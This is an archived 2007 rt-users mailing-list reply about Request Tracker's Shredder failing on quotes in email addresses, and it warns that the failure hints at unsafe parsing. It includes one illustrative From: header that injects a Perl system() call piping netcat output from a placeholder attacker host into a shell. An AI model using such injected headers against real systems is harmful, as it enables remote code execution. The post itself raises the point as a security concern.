[rt-users] Spam email question

Thu Feb 8 10:51:00 EST 2007

> Shredder doesn't like when an email address contains either a single-
> or double-qoute.

An email address, or the name associated with an email address?  If it
really is broken enough to get upset when an email address includes
unbalanced quotes, it's, well, broken; "\(*&$%\""@example.com is a
perfectly good email address, as is '^#&!`|@example.com.  (Some people
have even used such addresses, and find they don't get picked up by
spammer scrapeware - a useful property for email addresses to have.)

Even if it's the associated name, I'd call that somewhat broken.  I
know someone who uses "Patrick O'Reilly" as the name portion of his
email address (not coincidentally, that's his name).

> Understandably so considering this messes with Perl and makes it look
> for a closing, matching mark.

I find that extremely disturbing, because it implies that RT is
encountering these things in contexts where its string parsing code is
kicking in.  This makes me wonder if perhaps a mail bearing a header
like

From: "; system('cat /dev/null | nc evil.cracker.example.org 12345 | sh'); $dummy = " <me at innocent.example.org>

would do something nasty.  (It would even be legal from an email point
of view.)

/~\ The ASCII				der Mouse
\ / Ribbon Campaign
 X  Against HTML	       mouse at rodents.montreal.qc.ca